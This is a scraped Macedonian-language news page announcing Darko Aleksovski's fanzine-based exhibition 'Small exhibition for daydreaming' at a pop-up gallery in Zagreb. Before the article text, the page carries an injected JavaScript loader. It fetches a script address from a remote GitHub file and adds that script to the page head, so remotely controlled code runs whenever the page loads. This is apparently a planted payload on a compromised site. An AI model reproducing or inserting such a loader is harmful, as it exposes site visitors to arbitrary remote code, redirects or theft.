;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); „Мала изложба за мечтаење“ изложба на Дарко Алексовски во Загреб - Антропол
АктуелноИнтернационално

„Мала изложба за мечтаење“ изложба на Дарко Алексовски во Загреб

На 1 март со почеток од 19 часот во поп-ап галеријата „Гаража Камба“ во Загреб ќе се отвори „Mala izložba za sanjarenje“ (Мала изложба за мечтаење) – самостојна изложба на Дарко Алексовски.

Кураторка на изложбата е Сара Микелиќ. Изложбата е поделена на три меѓусебно поврзани сегменти: дванаесетте претходни изданија на „Мал прирачник за мечтаење“, ново издание реализирано во соработка со Стела Микулин и Жељко Бељан, како и дела создадени на партиципативна работилница за фанзини, која ќе се одржи на 28 февруари во просторот на галеријата.

„Мал прирачник за мечтаење“ е серија самостојно издадени фанзини на Дарко Алексовски преку кои тој истражува еден постојано променлив светоглед, како и мечтаењето за одредени места, предмети и ситуации каде што имагинацијата се испреплетува со нашите сеќавања. Изложбата е проширување на оваа мала серија публикации како начин за изразување преку различни визуелни и наративни методи. Појдовна точка за пронаоѓање и раскажување приказни во овие дела се утописки концепти, како на пример „пејзажи на восхитот“ (анг. landscapes of astonishment) предложен од Хозе Естебан Муњоз како начин да се „надминат ограничувањата на отуѓувачката сегашност [која] овозможува да се види различно време и место“, и „агорафилија“ (анг. agoraphilia) предложен од Пол Б. Пресиадо како љубовна страст предизвикана од град каде што материјалните граници помеѓу градските улици и телото стануваат толку нејасни што „мапата станува анатомија“.

Проектот има важен колаборативен и партиципативен аспект преку кој Алексовски поканува други уметници да предложат визуелни или пишани материјали за одредено издание. Уметниците Ивана Спироска, Симона Манчева и Џан Демир гостуваа во четвртиот, петтиот и единаесеттиот број, а партиципативните изданија се реализираат во рамки на работилници за фанзини.